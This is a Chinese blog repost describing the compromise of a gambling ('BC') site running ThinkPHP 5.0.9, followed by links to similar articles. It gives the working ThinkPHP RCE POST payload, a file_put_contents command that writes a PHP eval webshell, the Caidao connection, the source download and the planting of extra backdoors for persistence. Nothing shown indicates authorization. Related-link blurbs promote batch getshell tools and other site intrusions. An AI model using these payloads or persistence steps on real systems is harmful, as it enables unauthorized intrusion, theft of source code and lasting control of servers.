简单的BC站点getshell

最新推荐文章于 2023-12-05 23:15:00 发布
最新推荐文章于 2023-12-05 23:15:00 发布
阅读量944 收藏 5
点赞数
分类专栏: 实纪实战
原文链接:https://xz.aliyun.com/t/9232
版权 
更多黑客技能 公众号:暗网黑客

最近来了点任务,做BC站,以前没做过只能碰碰运气!

确定目标

主站:

图片

通过旁站:

图片

信息收集

通过信息收集发现是个tp v5.0.9,此版本存在tp-rce漏洞。

图片

直接通过payload进行测试,

Post:_method=__construct&filter[]=assert&method=get&get[]=phpinfo()
查找payload,直接打:

Post:_method=__construct&filter[]=assert&method=get&get[]=phpinfo()

图片

发现是php 5.4.45版本的,

直接尝试getshell:

在这里插入图片描述

发现system被禁用,尝试其他系统命令的也一样。

图片

查看phpinfo中desable_functions禁用了那些函数。

图片

想办法怎么绕过进行写马(此处卡了我半天)

最后通过一位渗透小伙伴,想出下面的可以利用file_put_contents直接写shell,

想了半天,忘了用其他函数进行直接写马就可以了,并不需要非得利用system命令进行写马,还是底层知识薄弱啊。

再次感谢小伙伴!

图片

getshell

构造payload:

_method=__construct&filter[]=assert&method=get&get[]=file_put_contents(‘a.php’,’<?php eval($_POST[a])?>’)

图片

写入成功,利用菜刀连接。

图片

成功连接。

查看权限:

图片

发现启动了远程安全模式。

想要绕过,发现很多函数被禁用,占未成功。

下载源码:

图片

多部署一些后门,防止被删。

作者:Squirrels

转载自:https://xz.aliyun.com/t/9232
在这里插入图片描述

zkzq
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
批量getshell工具
09-08
2017最新版的批量getshell工具,最全的cms识别系统,最快的getshell行动,各种cms,各种漏洞,各种getshell,你值得拥有!
一次对BC网站的渗透测试实战
最新发布
qq_35664104的博客
03-08 2102
一次对bc棋牌网的渗透实战
BC渗透的常见切入点(总结)
zhangge3663的博客
01-05 4399
做了不少qp,BC渗透了,通宵了2个晚上干了几个盘子,简略的说下过程,做一下总结。 首先说一下qp, 以我的渗透成功案例来说的话首先信息收集必不可少的,qp的特点是什么呢? 他的后台会在服务器域名的后面以不同的端口形式架设 如图: 关于端口可以发现,基础东西你们都懂。 切入点: 在app里面抓包,查找邮箱,充值的地方寻找sql注入或者意见反馈的位置XSS 有一种情况是抓包显示127.0.0.1的抓不到包的情况,这种情况多于大盘子,它不一定走的是TCP UDP协议。可以参考T-ice表哥说的 P..
对某bc站的一次渗透测试
zhangge3663的博客
10-27 4708
很多人问我你日站是用手工还是工具扫?我觉得两者同时进行效率会高些,所谓双管齐下,无站不破,当然还得看人品。 前段时间经常日有颜色的站,懂得都懂,emmm哈哈哈,但都是套路,跟bc又密不可分。 于是就按着套路顺利打开下面这个站: 刚好正是中午的时候,准备恰饭去,先将这个站丢到某W某S里面,如果有东西就直接捡现成的,于是: (ps:不得不承认我长得帅!) 懂的都懂 猜测估计是xp_cmdshell禁用或者删除 当前权限又是dba,而且支持堆叠可以执行update ,inser.
bc渗透,到社工20w会员的源码站站长
ss810540895的博客
04-01 629
年月日完全没有找到,打算登录邮箱看看有没有,找了一个泉州的ip,代理成功登录上QQ,完全可以说明这个人就在泉州,翻了一大圈都没有啥收货,只得到了一个没用的服务器和一个免签平台,我这里打算登录他的godady,不出意外服务器和域名都在这里,godady的用户名都拼接了好久,结果拼接对了登不上,重置了他的密码,但是有两步验证,还需要手机验证码,放弃这一步了。由于昨天本来想钓鱼的,在这个网站前端添加了一个flsh的钓鱼窗口,但是这个人不傻,没有下载,反而还上了安全狗,但就这个安全狗就成了这次社工的突破点。
渗透实战之一次bc渗透过狗过火绒经历
zkaqlaoniao的博客
10-29 3792
目录 事件起因 开始渗透 此时面临的难处 过狗转折点 公众号:黑客菌 分享更多技术文章,欢迎关注一起探讨学习 事件起因 从某个大佬手上获取到含有漏洞指纹信息的bc的cms。于是想尝试一波。通过指纹找一个站点。 PS:本文仅用于技术研究与讨论,严禁用于非法用途,违者后果自负 开始渗透 打开链接,发现是一个登录框,说登录框有注入,直接可以得到 --os-shell的权限 登录页面,直接sqlmap进--os-shell 一把梭,得到shell了 将shell传给cs,先在c.
Getshell最全总结.pdf
07-22
getshell最全总结
ThinkPHP v5.x命令执行利用工具(可getshell
11-19
ThinkPHP v5.x命令执行利用工具(可getshell
jboss漏洞getshell工具.zip
08-26
jboss漏洞getshell工具
批量getshell工具新版
12-21
批量getshell工具【2023最新】这是一种内部有多个漏洞,可自动进行url采集,自动爬虫多个引擎和友情链接url,过狗一句话,轻松日出上千。
实战|记一次绕过宝塔防火墙的BC渗透
zhangge3663的博客
05-06 9641
0x00 信息收集 由于主站存在云waf 一测就封 且初步测试不存在能用得上的洞 所以转战分站 希望能通过分站获得有价值的信息 这是一个查询代理帐号的站 url输入admin 自动跳转至后台 看这个参数,猜测可能是thinkCMF 0x01 getshell thinkcmf正好有一个RCE 可以尝试一下 ?a=fetch&templateFile=public/index&prefix='' &content=<php>file_put_content
看我如何拿下BC站的服务器
weixin_46137328的博客
10-13 2719
一、信息收集拿到目标网站,可见是一个很常规的bc站。先进行简单的信息收集,通过Wappalyzer插件可见php版本与windows serve这两个比较重要的信息命令行nslookup...
商城系统演示站 -多用户商城系统
chiweixia9095的博客
12-17 7587
!DOCTYPE html> <html lang="zh-cn"> <head> <meta charset="UTF-8"> <meta name="keywords" content="Bizpower商城系统演示站 - Bizpower多...
渗透bc网站教学_初一数学思想方法渗透技巧的研究 编号:2020009
weixin_39914863的博客
11-21 440
初一渗透数学思想技巧的策略研究-------心得体会陵城区实验中学 季淑红自从在2020年3月申报了区级小课题后,我就积极准备材料,扎实开展研究。现我把上半年研究的心得体会与大家分享,我研究的课题是“初一渗透数学思想技巧的策略研究”。七年级下册数学各章节中,渗透的数学思想有:数形结合、分类讨论、方程、转化、和整体的数学思想方法等。我在备课、上课、练习、典型例题讲解和复习课中渗透了这些数...
记一次bc站实战
hackzkaq的博客
12-05 61
Actuator 的核心是端点 Endpoint,它用来监视应用程序及交互,spring-boot-actuator 中已经内置了非常多的 Endpoint(health、info、beans、metrics、httptrace、shutdown等等),同时也允许我们自己扩展自己的 Endpoints。但是很遗憾,没有什么有价值的目录,连后台也扫不出来,但是这是在意料之中,毕竟大部分菠菜网站防护都做的挺好的。眉头一皱发现事情并不简单,在ip后随便加了一点,导致其报错,发现其使用的是spring框架。
一次BC站点的GetShell过程
ss810540895的博客
03-30 288
本文的渗透过程比较常规,涵盖了从0到1的完整单目标渗透过程,核心在于快速的代码审计能力,由于这个系统开发比较凌乱,所以故不能采用框架的方式去阅读,故采用危险函数定位是一种有效的方法,最后通过利用宝塔的信息,成功获取到最高的权限,完成渗透测试的目标。本文转自https://forum.butian.net/people/2968,如有侵权,请联系删除。
一次弱口令渗透BC
Azjj
06-04 2808
因为某种原因,接手了一个授权的bc站。 内心是拒绝的,但是没办法,硬着头皮收下了。 其实都知道,bc站不是很好弄,在大佬眼里,可能就是掏出一个0day就进去了 但像我这种dd,只敢远观。 打开主页,还算清新的画风,比那些打开就这闪那闪花里胡哨的站舒服多了。 简单的扫了一下目录,扫出了两个比较有用的的东西就是一个后台,一个探针 见到后台,废话不多说,直接弱口令套餐来一份 得到的结果肯定是 密码错误X1 密码错误X2 密码错误X3………… 算了,不浪费时间了,看一下探针~ 根据探针,得知网站的根目
渗透bc网站教学_重视思想方法的渗透与专题复习 有效落实核心素养的培养
weixin_39607865的博客
11-21 469
重视思想方法的渗透与专题复习 有效落实核心素养的培养——以八上期末《数形结合》专题课为例摘要:数学教学不仅使学生掌握现代生活、学习中必需的数学知识和技能,还应培养学生数学学科核心素养,为其适应终身学习奠定基础。连接“近处”的数学知识技能与“远方”的核心素养的关键在于数学思想方法的培养,一线教师需注重日常教学中数学思想方法的不断渗透与阶段性的专题复习。关键词:核心素养;数学知识;思想方法一...
getshell脚本
09-09
getshell脚本是用于在目标网站上植入恶意代码或命令执行的脚本。通过使用有效的用户名和密码组合,getshell脚本可以自动登录到目标网站的后台,并替换cookies以保持登录状态。一种常见的getshell脚本演示了如何使用...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值